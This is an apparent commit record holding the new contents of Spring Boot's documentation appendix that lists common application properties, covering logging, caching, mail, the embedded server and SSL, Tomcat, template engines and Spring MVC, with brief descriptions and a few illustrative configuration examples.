spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,jayarampradhan\/spring-boot,cleverjava\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,vpavic\/spring-boot,xiaoleiPENG\/my-project,NetoDevel\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,dreis2211\/spring-boot,joshiste\/spring-boot,donhuvy\/spring-boot,brettwooldridge\/spring-boot,lburgaz
zoli\/spring-boot,philwebb\/spring-boot,jvz\/spring-boot,tiarebalbi\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,lenicliu\/spring-boot,minmay\/spring-boot,vpavic\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,olivergierke\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,joshthornhill\/spring-boot,vakninr\/spring-boot,xiaoleiPENG\/my-project,htynkn\/spring-boot,felipeg48\/spring-boot,donhuvy\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,Nowheresly\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,mdeinum\/spring-boot,ilayaperumalg\/spring-boot,vakninr\/spring-boot,sebastiankirsch\/spring-boot,hello2009chen\/spring-boot,sbcoba\/spring-boot,drumonii\/spring-boot,mdeinum\/spring-boot,akmaharshi\/jenkins,scottfrederick\/spring-boot,pvorb\/spring-boot,neo4j-contrib\/spring-boot,michael-simons\/spring-boot,SaravananParthasarathy\/SPSDemo,mevasaroj\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,royclarkson\/spring-boot,sebastiankirsch\/spring-boot,thomasdarimont\/spring-boot,lenicliu\/spring-boot,kdvolder\/spring-boot,qerub\/spring-boot,jayarampradhan\/spring-boot,donhuvy\/spring-boot,akmaharshi\/jenkins,donhuvy\/spring-boot,mdeinum\/spring-boot,ollie314\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# BANNER\n\tbanner.charset=UTF-8 # Banner file encoding.\n\tbanner.location=classpath:banner.txt # Banner file location.\n\n\t# LOGGING\n\tlogging.config= # Location of the logging configuration file. For instance `classpath:logback.xml` for Logback\n\tlogging.exception-conversion-word=%wEx # Conversion word used when logging exceptions.\n\tlogging.file= # Log file name. For instance `myapp.log`\n\tlogging.level.*= # Log levels severity mapping. For instance `logging.level.org.springframework=DEBUG`\n\tlogging.path= # Location of the log file. For instance `\/var\/log`\n\tlogging.pattern.console= # Appender pattern for output to the console. Only supported with the default logback setup.\n\tlogging.pattern.file= # Appender pattern for output to the file. 
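# ---- Example (illustrative; not part of the original listing) ----
# A minimal sketch of the logging keys above: a log file plus per-package
# levels; the package names and file name are placeholders.
logging.file=myapp.log
logging.level.org.springframework.web=DEBUG
logging.level.org.hibernate=ERROR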
Only supported with the default logback setup.\n\tlogging.pattern.level= # Appender pattern for log level (default %5p). Only supported with the default logback setup.\n\tlogging.register-shutdown-hook=false # Register a shutdown hook for the logging system when it is initialized.\n\n\t# AOP\n\tspring.aop.auto=true # Add @EnableAspectJAutoProxy.\n\tspring.aop.proxy-target-class=false # Whether subclass-based (CGLIB) proxies are to be created (true) as opposed to standard Java interface-based proxies (false).\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.index= # Application index.\n\tspring.application.name= # Application name.\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # Enable admin features for the application.\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean.\n\n\t# AUTO-CONFIGURATION\n\tspring.autoconfigure.exclude= # Auto-configuration classes to exclude.\n\n\t# SPRING CORE\n\tspring.beaninfo.ignore=true # Skip search of BeanInfo classes.\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.cache-names= # Comma-separated list of cache names to create if supported by the underlying cache manager.\n\tspring.cache.ehcache.config= # The location of the configuration file to use to initialize EhCache.\n\tspring.cache.guava.spec= # The spec to use to create caches. Check CacheBuilderSpec for more details on the spec format.\n\tspring.cache.hazelcast.config= # The location of the configuration file to use to initialize Hazelcast.\n\tspring.cache.infinispan.config= # The location of the configuration file to use to initialize Infinispan.\n\tspring.cache.jcache.config= # The location of the configuration file to use to initialize the cache manager.\n\tspring.cache.jcache.provider= # Fully qualified name of the CachingProvider implementation to use to retrieve the JSR-107 compliant cache manager. Only needed if more than one JSR-107 implementation is available on the classpath.\n\tspring.cache.type= # Cache type, auto-detected according to the environment by default.\n\n\t# SPRING CONFIG - using environment property only ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.location= # Config file locations.\n\tspring.config.name=application # Config file name.\n\n\t# HAZELCAST ({sc-spring-boot-autoconfigure}\/hazelcast\/HazelcastProperties.{sc-ext}[HazelcastProperties])\n\tspring.hazelcast.config= # The location of the configuration file to use to initialize Hazelcast.\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name.\n\tspring.jmx.enabled=true # Expose management beans to the JMX domain.\n\tspring.jmx.server=mbeanServer # MBeanServer bean name.\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.default-encoding=UTF-8 # Default MimeMessage encoding.\n\tspring.mail.host= # SMTP server host. For instance `smtp.example.com`\n\tspring.mail.jndi-name= # Session JNDI name. 
When set, takes precedence over other mail settings.\n\tspring.mail.password= # Login password of the SMTP server.\n\tspring.mail.port= # SMTP server port.\n\tspring.mail.properties.*= # Additional JavaMail session properties.\n\tspring.mail.protocol=smtp # Protocol used by the SMTP server.\n\tspring.mail.test-connection=false # Test that the mail server is available on startup.\n\tspring.mail.username= # Login user of the SMTP server.\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.banner-mode=console # Mode used to display the banner when the application runs.\n\tspring.main.sources= # Sources (class name, package name or XML resource location) to include in the ApplicationContext.\n\tspring.main.web-environment= # Run the application in a web environment (auto-detected by default).\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use.\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages # Comma-separated list of basenames, each following the ResourceBundle convention.\n\tspring.messages.cache-seconds=-1 # Loaded resource bundle files cache expiration, in seconds. When set to -1, bundles are cached forever.\n\tspring.messages.encoding=UTF-8 # Message bundles encoding.\n\tspring.messages.fallback-to-system-locale=true # Set whether to fall back to the system Locale if no files for a specific Locale have been found.\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (can be "detect", "always", "never").\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.fail-on-write-error= # Fail if ApplicationPidFileWriter is used but it cannot write the PID file.\n\tspring.pid.file= # Location of the PID file to write (if ApplicationPidFileWriter is used).\n\n\t# PROFILES\n\tspring.profiles.active= # Comma-separated list of <<howto-set-active-spring-profiles,active profiles>>.\n\tspring.profiles.include= # Unconditionally activate the specified comma-separated profiles.\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.api-key= # SendGrid api key (alternative to username\/password)\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\n\t# ----------------------------------------\n\t# WEB PROPERTIES\n\t# ----------------------------------------\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true # Enable support of multi-part uploads.\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk. Values can use the suffixed "MB" or "KB" to indicate a Megabyte or Kilobyte size.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size. Values can use the suffixed "MB" or "KB" to indicate a Megabyte or Kilobyte size.\n\tmultipart.max-request-size=10Mb # Max request size. 
Values can use the suffixed \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.address= # Network address to which the server should bind to.\n\tserver.compression.enabled=false # If response compression is enabled.\n\tserver.compression.excluded-user-agents= # List of user-agents to exclude from compression.\n\tserver.compression.mime-types= # Comma-separated list of MIME types that should be compressed. For instance `text\/html,text\/css,application\/json`\n\tserver.compression.min-response-size= # Minimum response size that is required for compression to be performed. For instance 2048\n\tserver.context-parameters.*= # Servlet context init parameters. For instance `server.context-parameters.a=alpha`\n\tserver.context-path= # Context path of the application.\n\tserver.display-name=application # Display name of the application.\n\tserver.error.include-stacktrace=never # When to include a \"stacktrace\" attribute.\n\tserver.error.path=\/error # Path of the error controller.\n\tserver.error.whitelabel.enabled=true # Enable the default error page displayed in browsers in case of a server error.\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet.\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.port=8080 # Server HTTP port.\n\tserver.server-header= # The value sent in the server response header (uses servlet container default if empty)\n\tserver.servlet-path=\/ # Path of the main dispatcher servlet.\n\tserver.session.cookie.comment= # Comment for the session cookie.\n\tserver.session.cookie.domain= # Domain for the session cookie.\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie.\n\tserver.session.cookie.max-age= # Maximum age of the session cookie in seconds.\n\tserver.session.cookie.name= # Session cookie name.\n\tserver.session.cookie.path= # Path of the session cookie.\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie.\n\tserver.session.persistent=false # Persist session data between restarts.\n\tserver.session.store-dir= # Directory used to store session data.\n\tserver.session.timeout= # Session timeout in seconds.\n\tserver.session.tracking-modes= # Session tracking modes (one or more of the following: \"cookie\", \"url\", \"ssl\").\n\tserver.ssl.ciphers= # Supported SSL ciphers.\n\tserver.ssl.client-auth= # Whether client authentication is wanted (\"want\") or needed (\"need\"). Requires a trust store.\n\tserver.ssl.enabled= #\n\tserver.ssl.key-alias= #\n\tserver.ssl.key-password= #\n\tserver.ssl.key-store= #\n\tserver.ssl.key-store-password= #\n\tserver.ssl.key-store-provider= #\n\tserver.ssl.key-store-type= #\n\tserver.ssl.protocol= #\n\tserver.ssl.trust-store= #\n\tserver.ssl.trust-store-password= #\n\tserver.ssl.trust-store-provider= #\n\tserver.ssl.trust-store-type= #\n\tserver.tomcat.accesslog.directory=logs # Directory in which log files are created. 
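# ---- Example (illustrative; not part of the original listing) ----
# A minimal sketch of HTTPS plus response compression using the server.*
# keys above; the keystore location and passwords are placeholders.
server.port=8443
server.ssl.key-store=classpath:keystore.jks
server.ssl.key-store-password=changeit
server.ssl.key-password=changeit
server.compression.enabled=true
server.compression.mime-types=text\/html,text\/css,application\/json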
Can be relative to the tomcat base dir or absolute.\n\tserver.tomcat.accesslog.enabled=false # Enable access log.\n\tserver.tomcat.accesslog.pattern=common # Format pattern for access logs.\n\tserver.tomcat.accesslog.prefix=access_log # Log file name prefix.\n\tserver.tomcat.accesslog.suffix=.log # Log file name suffix.\n\tserver.tomcat.background-processor-delay=30 # Delay in seconds between the invocation of backgroundProcess methods.\n\tserver.tomcat.basedir= # Tomcat base directory. If not specified a temporary directory will be used.\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # Regular expression matching trusted IP addresses.\n\tserver.tomcat.max-http-header-size=0 # Maximum size in bytes of the HTTP message header.\n\tserver.tomcat.max-threads=0 # Maximum amount of worker threads.\n\tserver.tomcat.port-header=X-Forwarded-Port # Name of the HTTP header used to override the original port value.\n\tserver.tomcat.protocol-header= # Header that holds the incoming protocol, usually named \"X-Forwarded-Proto\".\n\tserver.tomcat.protocol-header-https-value=https # Value of the protocol header that indicates that the incoming request uses SSL.\n\tserver.tomcat.remote-ip-header= # Name of the HTTP header from which the remote IP is extracted. For instance `X-FORWARDED-FOR`\n\tserver.tomcat.uri-encoding=UTF-8 # Character encoding to use to decode the URI.\n\tserver.undertow.accesslog.dir= # Undertow access log directory.\n\tserver.undertow.accesslog.enabled=false # Enable access log.\n\tserver.undertow.accesslog.pattern=common # Format pattern for access logs.\n\tserver.undertow.buffer-size= # Size of each buffer in bytes.\n\tserver.undertow.buffers-per-region= # Number of buffers per region.\n\tserver.undertow.direct-buffers= # Allocate buffers outside the Java heap.\n\tserver.undertow.io-threads= # Number of I\/O threads to create for the worker.\n\tserver.undertow.worker-threads= # Number of worker threads.\n\tserver.use-forward-headers= # If X-Forwarded-* headers should be applied to the HttpRequest.\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.freemarker.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.freemarker.cache=false # Enable template caching.\n\tspring.freemarker.charset=UTF-8 # Template encoding.\n\tspring.freemarker.check-template-location=true # Check that the templates location exists.\n\tspring.freemarker.content-type=text\/html # Content-Type value.\n\tspring.freemarker.enabled=true # Enable MVC view resolution for this technology.\n\tspring.freemarker.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.freemarker.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior
to merging with the template.\n\tspring.freemarker.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.freemarker.prefer-file-system-access=true # Prefer file system access for template loading. File system access enables hot detection of template changes.\n\tspring.freemarker.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.freemarker.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.freemarker.settings.*= # Well-known FreeMarker keys which will be passed to FreeMarker's Configuration.\n\tspring.freemarker.suffix= # Suffix that gets appended to view names when building a URL.\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # Comma-separated list of template paths.\n\tspring.freemarker.view-names= # White list of view names that can be resolved.\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.groovy.template.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.groovy.template.cache= # Enable template caching.\n\tspring.groovy.template.charset=UTF-8 # Template encoding.\n\tspring.groovy.template.check-template-location=true # Check that the templates location exists.\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html # Content-Type value.\n\tspring.groovy.template.enabled=true # Enable MVC view resolution for this technology.\n\tspring.groovy.template.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.groovy.template.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.groovy.template.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.groovy.template.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.groovy.template.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/ # Template path.\n\tspring.groovy.template.suffix=.tpl # Suffix that gets appended to view names when building a URL.\n\tspring.groovy.template.view-names= # White list of view names that can be resolved.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.use-hal-as-default-json-media-type=true # Specify if application\/hal+json responses should be sent to requests that accept application\/json.\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper=jackson # Preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.
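\n\n\t# Example (illustrative): with both Jackson and Gson on the classpath, Gson can\n\t# be selected for HTTP message conversion:\n\t#\n\t#   spring.http.converters.preferred-json-mapper=gson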
Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # Charset of HTTP requests and responses. Added to the \"Content-Type\" header if not set explicitly.\n\tspring.http.encoding.enabled=true # Enable http encoding support.\n\tspring.http.encoding.force=true # Force the encoding to the configured charset on HTTP requests and responses.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string or a fully-qualified date format class name. For instance `yyyy-MM-dd HH:mm:ss`.\n\tspring.jackson.deserialization.*= # Jackson on\/off features that affect the way Java objects are deserialized.\n\tspring.jackson.generator.*= # Jackson on\/off features for generators.\n\tspring.jackson.joda-date-time-format= # Joda date time format string. If not configured, \"date-format\" will be used as a fallback if it is configured with a format string.\n\tspring.jackson.locale= # Locale used for formatting.\n\tspring.jackson.mapper.*= # Jackson general purpose on\/off features.\n\tspring.jackson.parser.*= # Jackson on\/off features for parsers.\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy. Can also be a fully-qualified class name of a PropertyNamingStrategy subclass.\n\tspring.jackson.serialization.*= # Jackson on\/off features that affect the way Java objects are serialized.\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization. Configured with one of the values in Jackson's JsonInclude.Include enumeration.\n\tspring.jackson.time-zone= # Time zone used when formatting dates. For instance `America\/Los_Angeles`\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.application-path= # Path that serves as the base URI for the application. Overrides the value of \"@ApplicationPath\" if specified.\n\tspring.jersey.filter.order=0 # Jersey filter chain order.\n\tspring.jersey.init.*= # Init parameters to pass to Jersey via the servlet or filter.\n\tspring.jersey.type=servlet # Jersey integration type. 
Can be either \"servlet\" or \"filter\".\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback=false # Enable support for fallback resolution.\n\tspring.mobile.devicedelegatingviewresolver.enabled=false # Enable device view resolver.\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/ # Prefix that gets prepended to view names for mobile devices.\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix= # Suffix that gets appended to view names for mobile devices.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix= # Prefix that gets prepended to view names for normal devices.\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix= # Suffix that gets appended to view names for normal devices.\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/ # Prefix that gets prepended to view names for tablet devices.\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix= # Suffix that gets appended to view names for tablet devices.\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # Enable SitePreferenceHandler.\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=false # Enable template caching.\n\tspring.mustache.charset=UTF-8 # Template encoding.\n\tspring.mustache.check-template-location=true # Check that the templates location exists.\n\tspring.mustache.content-type=text\/html # Content-Type value.\n\tspring.mustache.enabled=true # Enable MVC view resolution for this technology.\n\tspring.mustache.prefix=classpath:\/templates\/ # Prefix to apply to template names.\n\tspring.mustache.suffix=.html # Suffix to apply to template names.\n\tspring.mustache.view-names= # White list of view names that can be resolved.\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.async.request-timeout= # Amount of time (in milliseconds) before asynchronous request handling times out.\n\tspring.mvc.date-format= # Date format to use. For instance `dd\/MM\/yyyy`.\n\tspring.mvc.dispatch-trace-request=false # Dispatch TRACE requests to the FrameworkServlet doService method.\n\tspring.mvc.dispatch-options-request=false # Dispatch OPTIONS requests to the FrameworkServlet doService method.\n\tspring.mvc.favicon.enabled=true # Enable resolution of favicon.ico.\n\tspring.mvc.ignore-default-model-on-redirect=true # If the content of the \"default\" model should be ignored during redirect scenarios.\n\tspring.mvc.locale= # Locale to use.\n\tspring.mvc.media-types.*= # Maps file extensions to media types for content negotiation.\n\tspring.mvc.message-codes-resolver-format= # Formatting strategy for message codes. 
For instance `PREFIX_ERROR_CODE`.\n\tspring.mvc.static-path-pattern=\/** # Path pattern used for static resources.\n\tspring.mvc.throw-exception-if-no-handler-found=false # If a \"NoHandlerFoundException\" should be thrown if no Handler was found to process a request.\n\tspring.mvc.view.prefix= # Spring MVC view prefix.\n\tspring.mvc.view.suffix= # Spring MVC view suffix.\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.add-mappings=true # Enable default resource handling.\n\tspring.resources.cache-period= # Cache period for the resources served by the resource handler, in seconds.\n\tspring.resources.chain.cache=true # Enable caching in the Resource chain.\n\tspring.resources.chain.enabled= # Enable the Spring Resource Handling chain. Disabled by default unless at least one strategy has been enabled.\n\tspring.resources.chain.html-application-cache=false # Enable HTML5 application cache manifest rewriting.\n\tspring.resources.chain.strategy.content.enabled=false # Enable the content Version Strategy.\n\tspring.resources.chain.strategy.content.paths=\/** # Comma-separated list of patterns to apply to the Version Strategy.\n\tspring.resources.chain.strategy.fixed.enabled=false # Enable the fixed Version Strategy.\n\tspring.resources.chain.strategy.fixed.paths= # Comma-separated list of patterns to apply to the Version Strategy.\n\tspring.resources.chain.strategy.fixed.version= # Version string to use for the Version Strategy.\n\tspring.resources.static-locations=classpath:\/META-INF\/resources\/,classpath:\/resources\/,classpath:\/static\/,classpath:\/public\/ # Locations of static resources.\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=false # Enable the connection status view for supported providers.\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.cache=true # Enable template caching.\n\tspring.thymeleaf.check-template-location=true # Check that the templates location exists.\n\tspring.thymeleaf.content-type=text\/html # Content-Type value.\n\tspring.thymeleaf.enabled=true # Enable MVC Thymeleaf view resolution.\n\tspring.thymeleaf.encoding=UTF-8 # Template encoding.\n\tspring.thymeleaf.excluded-view-names= # Comma-separated list of view names that should be excluded from resolution.\n\tspring.thymeleaf.mode=HTML5 # Template mode to be applied to templates. 
See also StandardTemplateModeHandlers.\n\tspring.thymeleaf.prefix=classpath:\/templates\/ # Prefix that gets prepended to view names when building a URL.\n\tspring.thymeleaf.suffix=.html # Suffix that gets appended to view names when building a URL.\n\tspring.thymeleaf.template-resolver-order= # Order of the template resolver in the chain.\n\tspring.thymeleaf.view-names= # Comma-separated list of view names that can be resolved.\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.velocity.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.velocity.cache= # Enable template caching.\n\tspring.velocity.charset=UTF-8 # Template encoding.\n\tspring.velocity.check-template-location=true # Check that the templates location exists.\n\tspring.velocity.content-type=text\/html # Content-Type value.\n\tspring.velocity.date-tool-attribute= # Name of the DateTool helper object to expose in the Velocity context of the view.\n\tspring.velocity.enabled=true # Enable MVC view resolution for this technology.\n\tspring.velocity.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.velocity.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.velocity.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.velocity.number-tool-attribute= # Name of the NumberTool helper object to expose in the Velocity context of the view.\n\tspring.velocity.prefer-file-system-access=true # Prefer file system access for template loading. File system access enables hot detection of template changes.\n\tspring.velocity.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.velocity.properties.*= # Additional velocity properties.\n\tspring.velocity.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.velocity.resource-loader-path=classpath:\/templates\/ # Template path.\n\tspring.velocity.suffix=.vm # Suffix that gets appended to view names when building a URL.\n\tspring.velocity.toolbox-config-location= # Velocity Toolbox config location. For instance `\/WEB-INF\/toolbox.xml`\n\tspring.velocity.view-names= # White list of view names that can be resolved.
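\n\n\t# Example (illustrative): template caching is typically switched off during\n\t# development so changes are picked up without a restart, e.g. for Thymeleaf:\n\t#\n\t#   spring.thymeleaf.cache=false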
